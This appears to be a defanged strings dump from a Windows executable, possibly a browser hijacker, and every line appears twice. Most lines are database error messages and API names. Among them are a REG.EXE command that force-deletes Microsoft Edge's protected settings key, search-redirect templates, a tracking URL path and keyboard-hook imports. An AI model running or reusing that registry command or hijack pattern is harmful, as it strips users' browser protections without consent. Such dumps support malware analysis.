DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
hXXp://ocsp.verisign.com0
hXXp://VVV.vmware.com/0
hXXp://VVV.vmware.com/0
O"%U.
O"%U.
"`#.hr
"`#.hr
MP0.jc
MP0.jc
%DP`H
%DP`H
v%%DH
v%%DH
~.xp`I
~.xp`I
.VQWd
.VQWd
\.WWWW9
\.WWWW9
tCPTFlRPu
tCPTFlRPu
?%D|W
?%D|W
\.DHLP.
\.DHLP.
\.hlpt.
\.hlpt.
is %d?)`
is %d?)`
'%s:%d: reX
'%s:%d: reX
ng)msg_hdr|
ng)msg_hdr|
.too smh7
.too smh7
?gKey-Arg
?gKey-Arg
_KEY_BLOC
_KEY_BLOC
.UDICQ
.UDICQ
@.MNl1
@.MNl1
SSLEAY32.dll
SSLEAY32.dll
SSL_CTX_get_cert_store
SSL_CTX_get_cert_store
SSL_CTX_get_client_cert_cb
SSL_CTX_get_client_cert_cb
SSL_CTX_set_cert_store
SSL_CTX_set_cert_store
SSL_CTX_set_cert_verify_callback
SSL_CTX_set_cert_verify_callback
SSL_CTX_set_client_cert_cb
SSL_CTX_set_client_cert_cb
SSL_CTX_set_client_cert_engine
SSL_CTX_set_client_cert_engine
SSL_CTX_set_msg_callback
SSL_CTX_set_msg_callback
SSL_CTX_set_srp_password
SSL_CTX_set_srp_password
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_ASN1
SSL_add_dir_cert_subjects_to_stack
SSL_add_dir_cert_subjects_to_stack
SSL_add_file_cert_subjects_to_stack
SSL_add_file_cert_subjects_to_stack
SSL_check_private_key
SSL_check_private_key
SSL_export_keying_material
SSL_export_keying_material
SSL_get_certificate
SSL_get_certificate
SSL_get_peer_cert_chain
SSL_get_peer_cert_chain
SSL_get_privatekey
SSL_get_privatekey
SSL_set_msg_callback
SSL_set_msg_callback
SSL_use_PrivateKey
SSL_use_PrivateKey
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey_file
SSL_use_PrivateKey_file
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_file
SSL_use_RSAPrivateKey_file
SSL_use_certificate
SSL_use_certificate
SSL_use_certificate_ASN1
SSL_use_certificate_ASN1
SSL_use_certificate_file
SSL_use_certificate_file
WinExec
WinExec
SetProcessShutdownParameters
SetProcessShutdownParameters
SetNamedPipeHandleState
SetNamedPipeHandleState
GetWindowsDirectoryA
GetWindowsDirectoryA
GetCPInfo
GetCPInfo
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegSaveKeyA
RegSaveKeyA
RegRestoreKeyA
RegRestoreKeyA
RegQueryInfoKeyW
RegQueryInfoKeyW
RegQueryInfoKeyA
RegQueryInfoKeyA
RegOpenKeyExW
RegOpenKeyExW
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyExA
SetViewportOrgEx
SetViewportOrgEx
ShellExecuteW
ShellExecuteW
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
CreateDialogIndirectParamW
CreateDialogIndirectParamW
CreateDialogIndirectParamA
CreateDialogIndirectParamA
ActivateKeyboardLayout
ActivateKeyboardLayout
GetKeyboardType
GetKeyboardType
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
'!.vxj%
'!.vxj%
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
advapi32.dll
advapi32.dll
d3d9.dll
d3d9.dll
gdi32.dll
gdi32.dll
mpr.dll
mpr.dll
opengl32.dll
opengl32.dll
shell32.dll
shell32.dll
user32.dll
user32.dll
version.dll
version.dll
*#%"{}|\^[]`
*#%"{}|\^[]`
hXXps://
hXXps://
/ot.php?imsid=
/ot.php?imsid=
sDELETE "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy" /f
sDELETE "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy" /f
REG.EXE
REG.EXE
hXXp://VVV.w3.org/2001/XMLSchema
hXXp://VVV.w3.org/2001/XMLSchema
hXXp://VVV.w3.org/2000/xmlns/
hXXp://VVV.w3.org/2000/xmlns/
hXXp://VVV.w3.org/2001/XMLSchema-instance
hXXp://VVV.w3.org/2001/XMLSchema-instance
{searchTerms}&text2=%s&suggest=1&type=6
{searchTerms}&text2=%s&suggest=1&type=6
{searchTerms}&text2=%s&instant=1&type=6
{searchTerms}&text2=%s&instant=1&type=6
{searchTerms}&text2=%s&search=1&type=6
{searchTerms}&text2=%s&search=1&type=6
hXXp://google.com
hXXp://google.com
888816666554443
888816666554443
6666554443
6666554443
!6666554443
!6666554443
No matching DOM Vendor: "%s"
No matching DOM Vendor: "%s"
Node "%s" not found
Node "%s" not found
IDOMNode required.Attributes are not supported on this node type
IDOMNode required.Attributes are not supported on this node type
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
HSQLite library initialization failed. Main code [%d], extended code [%d]/Database specified by [%p] handle was not foundHVTab: Invalid number of arguments at VTabCreate. Expected [%d], got [%d](VTab: Dataset [%s] is not found or empty VTab: Operation is not supported!VTab: Savepoint [%d] is not found!VTab: Dataset modification failed/VTab: Explicit ROWID at INSERT is not supported9VTab: Dataset state was changed. Cannot perform operation"VTab: Specified row does not exist
HSQLite library initialization failed. Main code [%d], extended code [%d]/Database specified by [%p] handle was not foundHVTab: Invalid number of arguments at VTabCreate. Expected [%d], got [%d](VTab: Dataset [%s] is not found or empty VTab: Operation is not supported!VTab: Savepoint [%d] is not found!VTab: Dataset modification failed/VTab: Explicit ROWID at INSERT is not supported9VTab: Dataset state was changed. Cannot perform operation"VTab: Specified row does not exist
VTab: Invalid cursor;TADLocalSQL must be attached to an active SQLite connection0VTab: DataSet [%s] is busy by another result set/Cannot perform action. DBTOOLn.DLL is not found
VTab: Invalid cursor;TADLocalSQL must be attached to an active SQLite connection0VTab: DataSet [%s] is busy by another result set/Cannot perform action. DBTOOLn.DLL is not found
Unnamed)"%s" DOMImplementation already registered
Unnamed)"%s" DOMImplementation already registered
5Maximum length (%d) of GTRID exceeded - %d (NOE18/TX)5Maximum length (%d) of BQUAL exceeded - %d (NOE19/TX)@Maximum length (%d) of transaction name exceeded - %d (NOE20/TX)@Too many close braces in names file after alias [%s] (NOE105/DB)0[%s] is not a callable PL/SQL object (NOE130/SP)2[%s, #%d] is not found in [%s] package (NOE134/SP)TParameter with type TABLE OF BOOLEAN/RECORD not supported (use TADQuery) (NOE135/SP)KParameter with type RECORD must be of named type (use TADQuery) (NOE142/SP))Cannot convert Oracle Number [%s] to TBcd7DBMS_PIPE event alerter supports only single event name9Cannot start a trace session, when there is an active one"Stored procedure [%s] is not founduArray-typed variable [%s] dimensions [%d] are not supported.
5Maximum length (%d) of GTRID exceeded - %d (NOE18/TX)5Maximum length (%d) of BQUAL exceeded - %d (NOE19/TX)@Maximum length (%d) of transaction name exceeded - %d (NOE20/TX)@Too many close braces in names file after alias [%s] (NOE105/DB)0[%s] is not a callable PL/SQL object (NOE130/SP)2[%s, #%d] is not found in [%s] package (NOE134/SP)TParameter with type TABLE OF BOOLEAN/RECORD not supported (use TADQuery) (NOE135/SP)KParameter with type RECORD must be of named type (use TADQuery) (NOE142/SP))Cannot convert Oracle Number [%s] to TBcd7DBMS_PIPE event alerter supports only single event name9Cannot start a trace session, when there is an active one"Stored procedure [%s] is not founduArray-typed variable [%s] dimensions [%d] are not supported.
Only sigle dimensional simple type arrays are supportedqArray-typed variable [%s] unsupported element type [%d].
Only sigle dimensional simple type arrays are supportedqArray-typed variable [%s] unsupported element type [%d].
Only sigle dimensional simple type arrays are supportedCArray-typed variable [%s] item index [%d] is out of bounds [%d, %d]
Only sigle dimensional simple type arrays are supportedCArray-typed variable [%s] item index [%d] is out of bounds [%d, %d]
Cannot describe type [%d].
Cannot describe type [%d].
Possible reason: uADCompScriptCommands unit is not linked to the application`No script to execute for [%s].
Possible reason: uADCompScriptCommands unit is not linked to the application`No script to execute for [%s].
Possible reason: SQLScriptFileName and SQLScripts both are empty Connection parameter [%s] must be not empty|DbExpress driver configuration file [%s] is not found.
Possible reason: SQLScriptFileName and SQLScripts both are empty Connection parameter [%s] must be not empty|DbExpress driver configuration file [%s] is not found.
Possible reason: dbExpress is not properly installed on this machineUUnsupported MySQL version [%d].
Possible reason: dbExpress is not properly installed on this machineUUnsupported MySQL version [%d].
Supported are client and server from v 3.20 to v 6.2
Supported are client and server from v 3.20 to v 6.2
Port number cannot be changed&Error in parameter [%s] definition. %sFFailed to initialize embedded server.
Port number cannot be changed&Error in parameter [%s] definition. %sFFailed to initialize embedded server.
See MySQL log files for details/Variable [%s] C data type [%d] is not supported
See MySQL log files for details/Variable [%s] C data type [%d] is not supported
No cursors availableCCannot initialize OCI with character set [%s].
No cursors availableCCannot initialize OCI with character set [%s].
Possible reason: %s1Cannot assign value to BFILE/CFILE parameter [%s]HNo cursor parameters are defined. Include fiMeta into FetchOptions.Items9OCI is not properly installed on this machine (NOE1/INIT)ZUnsupported OCI library [%s] version [%s].
Possible reason: %s1Cannot assign value to BFILE/CFILE parameter [%s]HNo cursor parameters are defined. Include fiMeta into FetchOptions.Items9OCI is not properly installed on this machine (NOE1/INIT)ZUnsupported OCI library [%s] version [%s].
At least version 8.0.3 is required (NOE2/INIT)0Bad or undefined variable param type (NOE12/VAR)
At least version 8.0.3 is required (NOE2/INIT)0Bad or undefined variable param type (NOE12/VAR)
#Cannot read RAW data of [%s] object
#Cannot read RAW data of [%s] object
Class [%s] is not registered
Class [%s] is not registered
Unknown storage format [%s]"Cannot move file [%s] to [%s].
Unknown storage format [%s]"Cannot move file [%s] to [%s].
%s!Invalid date interval format [%s]Ênnot execute host command [%s].
%s!Invalid date interval format [%s]Ênnot execute host command [%s].
%s)String size must be of 1 character length.Character cannot be alphanumeric or whitespace
%s)String size must be of 1 character length.Character cannot be alphanumeric or whitespace
Invalid command [%s] syntax-ACCEPT statement must specify a variable name,DEFINE requires a value following equal sign
Invalid command [%s] syntax-ACCEPT statement must specify a variable name,DEFINE requires a value following equal sign
VARIABLE has missed right brace"VARIABLE has unsupported data typeÊnnot execute command. Not logged on
VARIABLE has missed right brace"VARIABLE has unsupported data typeÊnnot execute command. Not logged on
=Text field [%s] size is undefined in Fixed Size Record format"Text field [%s] name is Duplicated5Bad text value [%s] format for mapping item [%s].
=Text field [%s] size is undefined in Fixed Size Record format"Text field [%s] name is Duplicated5Bad text value [%s] format for mapping item [%s].
%s?Undefined source field or expression for destination field [%s]
%s?Undefined source field or expression for destination field [%s]
Timeout expired"Cannot get access to BLOB raw datahVariable length data parameter [%s] overflow.
Timeout expired"Cannot get access to BLOB raw datahVariable length data parameter [%s] overflow.
Value length - [%d], parameter data maximum length - [%d]PCannot perform nonblocking action, while other nonblocking action is in progress
Value length - [%d], parameter data maximum length - [%d]PCannot perform nonblocking action, while other nonblocking action is in progress
Macro [%s] is not found7Parameter [%s] value index [%d] is out of range [0..%d]mCannot acquire item (connection) from pool.
Macro [%s] is not found7Parameter [%s] value index [%d] is out of range [0..%d]mCannot acquire item (connection) from pool.
Maximal number [%d] of simultaneous items (connections) reached.@.
Maximal number [%d] of simultaneous items (connections) reached.@.
To register it, you can drop component [%s] into your project>.
To register it, you can drop component [%s] into your project>.
To register it, you can include unit [%s] into your project
To register it, you can include unit [%s] into your project
Cannot read [%s] property
Cannot read [%s] property
Cannot read [%s] object
Cannot read [%s] object
&Command [%s] must be in inactive state*Dataset [%s] must be in cached update moderConnection is not defined for [%s].
&Command [%s] must be in inactive state*Dataset [%s] must be in cached update moderConnection is not defined for [%s].
Connection [%s] must be online
Connection [%s] must be online
Table adapter [%s] cannot be assigned to [%s], because it is
Table adapter [%s] cannot be assigned to [%s], because it is
already assigned to [%s] and cannot be shared across few datasets6Dataset connection does not match to called connection Table [%s] must have primary keyWLocal SQL engine misusage by [%s].
already assigned to [%s] and cannot be shared across few datasets6Dataset connection does not match to called connection Table [%s] must have primary keyWLocal SQL engine misusage by [%s].
Hint: activate connection before activating dataset=Table [%s] index [%s] must be existing non-expressional index
Hint: activate connection before activating dataset=Table [%s] index [%s] must be existing non-expressional index
Dataset name must be not empty?Dataset name [%s] must be unique across Local SQL [%s] datasets
Dataset name must be not empty?Dataset name [%s] must be unique across Local SQL [%s] datasets
Text field [%s] is not found
Text field [%s] is not found
record has been changed/deleted by another user
record has been changed/deleted by another user
ADManager must be active#Connection name [%s] must be unique Connection [%s] must be inactive
ADManager must be active#Connection name [%s] must be unique Connection [%s] must be inactive
Connection [%s] must be active)Connection [%s] establishment is canceled
Connection [%s] must be active)Connection [%s] establishment is canceled
Connection [%s] cannot be pooled.
Connection [%s] cannot be pooled.
Possible reason: connection definition is not in the ADManager.ConnectionDefs list or
Possible reason: connection definition is not in the ADManager.ConnectionDefs list or
TADConnection.Params has additional parameters
TADConnection.Params has additional parameters
Connection [%s] is not found
Connection [%s] is not found
Possible reason: [%s] ConnectionName property is misspelled or references to nonexistent connection$Command [%s] must be in active state
Possible reason: [%s] ConnectionName property is misspelled or references to nonexistent connection$Command [%s] must be in active state
&Column [%s] data type is not supported
&Column [%s] data type is not supported
Param [%s] type changed from [ft%s] to [ft%s]. Query must be reprepared.
Param [%s] type changed from [ft%s] to [ft%s]. Query must be reprepared.
Possible reason: an assignment to a TADParam.AsXXX property implicitly changed the parameter data type.
Possible reason: an assignment to a TADParam.AsXXX property implicitly changed the parameter data type.
Hint: use the TADParam.Value or appropriate TADParam.AsXXX property1A meta data argument [%s] value must be specified
Hint: use the TADParam.Value or appropriate TADParam.AsXXX property1A meta data argument [%s] value must be specified
Expected number of parameters is [%d], but actual number is [%d].
Expected number of parameters is [%d], but actual number is [%d].
Possible reason: a parameter was added or deletedsData too large for variable [%s]. Max len = [%d], actual len = [%d]
Possible reason: a parameter was added or deletedsData too large for variable [%s]. Max len = [%d], actual len = [%d]
Hint: set the TADParam.Size to a greater value
Hint: set the TADParam.Size to a greater value
Database [%s] does not exist
Database [%s] does not exist
Access 2003 or earlier: hXXp://support.microsoft.com/kb/239114
Access 2003 or earlier: hXXp://support.microsoft.com/kb/239114
Access 2007: hXXp://VVV.microsoft.com/download/en/details.aspx?displaylang=en&id=23734
Access 2007: hXXp://VVV.microsoft.com/download/en/details.aspx?displaylang=en&id=23734
Access 2010: hXXp://VVV.microsoft.com/download/en/details.aspx?id=13255{JRO.JetEngine class is missing on client machine.
Access 2010: hXXp://VVV.microsoft.com/download/en/details.aspx?id=13255{JRO.JetEngine class is missing on client machine.
Hint: install latest engine from: hXXp://support.microsoft.com/kb/239114aDatabase format is not recognized.
Hint: install latest engine from: hXXp://support.microsoft.com/kb/239114aDatabase format is not recognized.
Possible reason: DBVersion value mismatches database version.&Specified database password is invalid
Possible reason: DBVersion value mismatches database version.&Specified database password is invalid
Unknown OLE error1To perform operation DriverLink must be specified To perform operation service must be activeGCannot deinstall a SQLite collation, while there are active connections?%s command %s [%d] instead of [1] record.
Unknown OLE error1To perform operation DriverLink must be specified To perform operation service must be activeGCannot deinstall a SQLite collation, while there are active connections?%s command %s [%d] instead of [1] record.
Possible reasons: %s
Possible reasons: %s
Connection must be inactive*Too many login retries. Allowed [%d] times1To perform operation driver manager, must be [%s]
Connection must be inactive*Too many login retries. Allowed [%d] times1To perform operation driver manager, must be [%s]
Character [%s] is missed
Character [%s] is missed
Too long identifier (> 255)6Parameter [%s] ArraySize [%d] is less than ATimes [%d]=Cannot perform action, because previous action is in progress%Escape function [%s] is not supported8Define(mmReset) is only supported for metainfo retrieval6Cannot generate update query. WHERE condition is empty4Cannot generate update query. Update table undefined
Too long identifier (> 255)6Parameter [%s] ArraySize [%d] is less than ATimes [%d]=Cannot perform action, because previous action is in progress%Escape function [%s] is not supported8Define(mmReset) is only supported for metainfo retrieval6Cannot generate update query. WHERE condition is empty4Cannot generate update query. Update table undefined
Cannot parse object name - [%s])Syntax error in escape function [%s].
Cannot parse object name - [%s])Syntax error in escape function [%s].
%shADPhysManager shutdown timeout.
%shADPhysManager shutdown timeout.
Possible reason: application has not released all connection interfaceszParameter [%s] data type is unknown.
Possible reason: application has not released all connection interfaceszParameter [%s] data type is unknown.
Hint: specify TADParam.DataType or assign TADParam value before Prepare/Execute call)Parameter [%s] data type is not supported
Hint: specify TADParam.DataType or assign TADParam value before Prepare/Execute call)Parameter [%s] data type is not supported
Set TADConnection.DriverName or add DriverID to your connection definition
Set TADConnection.DriverName or add DriverID to your connection definition
Capability is not supported
Capability is not supported
Transaction [%s] must be activeCTransaction [%s] must be inactive. Nested transactions are disabled
Transaction [%s] must be activeCTransaction [%s] must be inactive. Nested transactions are disabled
Hint: use Execute / ExecSQL method for non-SELECT commands!Command must be is prepared state]Cannot execute command returning result sets.
Hint: use Execute / ExecSQL method for non-SELECT commands!Command must be is prepared state]Cannot execute command returning result sets.
Hint: use Open method for SELECT-like commands!Command must be open for fetching,Exact %s [%d] rows, while [%d] was requested
Hint: use Open method for SELECT-like commands!Command must be open for fetching,Exact %s [%d] rows, while [%d] was requested
Meta information mismatchvCannot load vendor library [%s].
Meta information mismatchvCannot load vendor library [%s].
%sHint: check it is in the PATH or application EXE directories, and has x86 bitness./Cannot get vendor library entry point[s].
%sHint: check it is in the PATH or application EXE directories, and has x86 bitness./Cannot get vendor library entry point[s].
Record editing for dataset [%s] is disabled-Record inserting for dataset [%s] is disabled,Record deleting for dataset [%s] is disabled=Field [%s] specified within %s of DataSet [%s] does not existeCannot set dataset [%s] to offline mode.
Record editing for dataset [%s] is disabled-Record inserting for dataset [%s] is disabled,Record deleting for dataset [%s] is disabled=Field [%s] specified within %s of DataSet [%s] does not existeCannot set dataset [%s] to offline mode.
Hint: check that FetchOptions.AutoFetchAll is not afDisable|Cannot turn off cached updates mode for DataSet [%s].
Hint: check that FetchOptions.AutoFetchAll is not afDisable|Cannot turn off cached updates mode for DataSet [%s].
Hint: dataset has updated rows, cancel or apply updates before action.Cannot make definition [%s] circular reference7Cannot %s definition [%s]. It has associated connection!Cannot make definition persistent9Cannot load definition list, because it is already loaded$Definition [%s] is not found in [%s]"Definition name [%s] is duplicated"Driver [%s] is not registered.
Hint: dataset has updated rows, cancel or apply updates before action.Cannot make definition [%s] circular reference7Cannot %s definition [%s]. It has associated connection!Cannot make definition persistent9Cannot load definition list, because it is already loaded$Definition [%s] is not found in [%s]"Definition name [%s] is duplicated"Driver [%s] is not registered.
%sXDriver [%s] cannot be released.
%sXDriver [%s] cannot be released.
Hint: Close all TADConnection objects and release poolsNTo register it, you can drop component [TADPhys%sDriverLink] into your project5Correct driver ID or define [%s] virtual driver in %s
Hint: Close all TADConnection objects and release poolsNTo register it, you can drop component [TADPhys%sDriverLink] into your project5Correct driver ID or define [%s] virtual driver in %s
>Operation cannot mix aggregate value with record-varying value
>Operation cannot mix aggregate value with record-varying value
%s&Bookmark is not found for dataset [%s]
%s&Bookmark is not found for dataset [%s]
View [%s] is not a sorted view"Adapter interface must be suppliedUCannot set MasterSource for dataset [%s].
View [%s] is not a sorted view"Adapter interface must be suppliedUCannot set MasterSource for dataset [%s].
Nested datasets cannot have a MasterSourceMCannot set MasterSource for dataset [%s].
Nested datasets cannot have a MasterSourceMCannot set MasterSource for dataset [%s].
Circular datalinks are not alloweduCannot refresh dataset [%s].
Circular datalinks are not alloweduCannot refresh dataset [%s].
Cannot open dataset [%s].
Cannot open dataset [%s].
Hint: if that is TADMemTable, use CreateDataSet or CloneCursor to open dataset(Index [%s] is not found for dataset [%s],Aggregate [%s] is not found for dataset [%s]6Index [%s] definition is not complete for dataset [%s]:Aggregate [%s] definition is not complete for dataset [%s]7Cannot perform operation on unidirectional dataset [%s]LBookmark key fields [%s] are incompatible
Hint: if that is TADMemTable, use CreateDataSet or CloneCursor to open dataset(Index [%s] is not found for dataset [%s],Aggregate [%s] is not found for dataset [%s]6Index [%s] definition is not complete for dataset [%s]:Aggregate [%s] definition is not complete for dataset [%s]7Cannot perform operation on unidirectional dataset [%s]LBookmark key fields [%s] are incompatible
with dataset [%s] key fields [%s]
with dataset [%s] key fields [%s]
uColumn or function [%s] is not found.
uColumn or function [%s] is not found.
Invalid use of keyword
Invalid use of keyword
Invalid character found [%s]
Invalid character found [%s]
'(' expected but [%s] found"')' or ',' expected but [%s] found
'(' expected but [%s] found"')' or ',' expected but [%s] found
')' expected but [%s] found"IN predicate list may not be empty
')' expected but [%s] found"IN predicate list may not be empty
Expected [%s].Arithmetic in filter expressions not supported
Expected [%s].Arithmetic in filter expressions not supported
&Cannot perform operation for row state4Cannot change updates registry for DatS manager [%s]"Too many aggregate values per view9Grouping level exceeds maximum allowed for aggregate [%s]XVariable length column [%s] overflow.
&Cannot perform operation for row state4Cannot change updates registry for DatS manager [%s]"Too many aggregate values per view9Grouping level exceeds maximum allowed for aggregate [%s]XVariable length column [%s] overflow.
Value length - [%d], column maximum length - [%d]
Value length - [%d], column maximum length - [%d]
Invalid foreign key [%s]
Invalid foreign key [%s]
Invalid unique key [%s]#Cannot change column [%s] data type
Invalid unique key [%s]#Cannot change column [%s] data type
Invalid relation [%s](Cannot create parent view. Relation [%s]7Cannot change table [%s] structure, when table has rows;Found a cascading actions loop at checking foreign key [%s]
Invalid relation [%s](Cannot create parent view. Relation [%s]7Cannot change table [%s] structure, when table has rows;Found a cascading actions loop at checking foreign key [%s]
Record is not lockedFAssigning value [%s] is not compatible with column [%s] data type.
Record is not lockedFAssigning value [%s] is not compatible with column [%s] data type.
%s,Value [%s] is out of range of [%s] data type
%s,Value [%s] is out of range of [%s] data type
Column [%s] is read only
Column [%s] is read only
Cannot insert row into table"Column [%s] value must be not null4Duplicate row found on unique index. Constraint [%s]/Cannot process - no parent row. Constraint [%s]2Cannot process - child rows found. Constraint [%s]
Cannot insert row into table"Column [%s] value must be not null4Duplicate row found on unique index. Constraint [%s]/Cannot process - no parent row. Constraint [%s]2Cannot process - child rows found. Constraint [%s]
Cannot compare rowsÚta type conversion is not supported
Cannot compare rowsÚta type conversion is not supported
Column [%s] is not searchable=Row may have only single column of [dtParentRowRef] data typewCannot read data from or write data to the invariant column [%s].
Column [%s] is not searchable=Row may have only single column of [dtParentRowRef] data typewCannot read data from or write data to the invariant column [%s].
Row is not nested)Column [%s] is not reference to other row'Column [%s] is not reference to row set
Row is not nested)Column [%s] is not reference to other row'Column [%s] is not reference to row set
%s is not a valid BCD value
%s is not a valid BCD value
Invalid format type for BCD$Could not parse SQL TimeStamp string
Invalid format type for BCD$Could not parse SQL TimeStamp string
Invalid SQL date/time values
Invalid SQL date/time values
FireDAC Login#Name [%s] is duplicated in the list
FireDAC Login#Name [%s] is duplicated in the list
Object [%s] is not found(Column [%s] type is unknown or undefined
Object [%s] is not found(Column [%s] type is unknown or undefined
Constraint [%s]
Constraint [%s]
Cannot begin edit row'Cannot create child view. Relation [%s]
Cannot begin edit row'Cannot create child view. Relation [%s]
Cannot delete row Column [%s] must have blob value_Fixed length column [%s] data length mismatch.
Cannot delete row Column [%s] must have blob value_Fixed length column [%s] data length mismatch.
Value length - [%d], column fixed length - [%d]
Value length - [%d], column fixed length - [%d]
0Cannot perform this operation on an open dataset"Dataset not in edit or insert mode1Cannot perform this operation on a closed dataset1Cannot perform this operation on an empty dataset!Cannot modify a read-only dataset#Nested dataset must inherit from %s
0Cannot perform this operation on an open dataset"Dataset not in edit or insert mode1Cannot perform this operation on a closed dataset1Cannot perform this operation on an empty dataset!Cannot modify a read-only dataset#Nested dataset must inherit from %s
Parameter '%s' not found
Parameter '%s' not found
Unable to load bind parameters$Field '%s' is of an unsupported type
Unable to load bind parameters$Field '%s' is of an unsupported type
SQL not supported: %s
SQL not supported: %s
Execute not supported: %s1Operation not allowed on a unidirectional dataset
Execute not supported: %s1Operation not allowed on a unidirectional dataset
0'%s' is not a valid integer value for field '%s'0'%s' is not a valid boolean value for field '%s'7'%s' is not a valid floating point value for field '%s'6Type mismatch for field '%s', expecting: %s actual: %s6Size mismatch for field '%s', expecting: %d actual: %d Invalid variant type or size for field '%s'#Value of field '%s' is out of range
0'%s' is not a valid integer value for field '%s'0'%s' is not a valid boolean value for field '%s'7'%s' is not a valid floating point value for field '%s'6Type mismatch for field '%s', expecting: %s actual: %s6Size mismatch for field '%s', expecting: %d actual: %d Invalid variant type or size for field '%s'#Value of field '%s' is out of range
Field '%s' must have a value
Field '%s' must have a value
Field '%s' has no dataset1Field '%s' cannot be a calculated or lookup field
Field '%s' has no dataset1Field '%s' cannot be a calculated or lookup field
Field '%s' cannot be modified
Field '%s' cannot be modified
No index currently active0Field '%s' is not indexed and cannot be modified"Circular datalinks are not allowed/Lookup information for field '%s' is incomplete
No index currently active0Field '%s' is not indexed and cannot be modified"Circular datalinks are not allowed/Lookup information for field '%s' is incomplete
No help keyword specified.
No help keyword specified.
Invalid FieldKind Field '%s' is of an unknown type
Invalid FieldKind Field '%s' is of an unknown type
Duplicate field name '%s'
Duplicate field name '%s'
Field '%s' not found#Cannot access field '%s' as type %s
Field '%s' not found#Cannot access field '%s' as type %s
Invalid value for field '%s'E%g is not a valid value for field '%s'. The allowed range is %g to %gE%s is not a valid value for field '%s'. The allowed range is %s to %s
Invalid value for field '%s'E%g is not a valid value for field '%s'. The allowed range is %g to %gE%s is not a valid value for field '%s'. The allowed range is %s to %s
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt Clipboard does not support Icons/Menu '%s' is already being used by another form
Alt Clipboard does not support Icons/Menu '%s' is already being used by another form
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Invalid MMF name "%s"*The MMF named "%s" cannot be created empty
Invalid MMF name "%s"*The MMF named "%s" cannot be created empty
Win32 error: %s (%u)%s%s
Win32 error: %s (%u)%s%s
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Unsupported clipboard format
Unsupported clipboard format
128-Byte PrefetchingeCPUID leaf 2 does not report cache descriptor information, use CPUID leaf 4 to query cache parameters
128-Byte PrefetchingeCPUID leaf 2 does not report cache descriptor information, use CPUID leaf 4 to query cache parameters
Windows 8.1
Windows 8.1
Windows Server 2012 R2
Windows Server 2012 R2
(Failed to get ANSI replacement character#Unable to open key "%s\%s" for read$Unable to open key "%s\%s" for write0Unable to open key "%s\%s" and access value "%s"#"%s\%s\%s" is of wrong kind or size
(Failed to get ANSI replacement character#Unable to open key "%s\%s" for read$Unable to open key "%s\%s" for write0Unable to open key "%s\%s" and access value "%s"#"%s\%s\%s" is of wrong kind or size
"%s" does not match RootKey
"%s" does not match RootKey
bClient policy does not allow credential delegation to target server with NLTM only authentication.1The recipient rejected the renegotiation request.-The required security context does not exist.`The PKU2U protocol encountered an error while attempting to utilize the associated certificates.:The identity of the server computer could not be verified.
bClient policy does not allow credential delegation to target server with NLTM only authentication.1The recipient rejected the renegotiation request.-The required security context does not exist.`The PKU2U protocol encountered an error while attempting to utilize the associated certificates.:The identity of the server computer could not be verified.
Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properly
Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properly
Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported
Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported
Invalid stream operation
Invalid stream operation
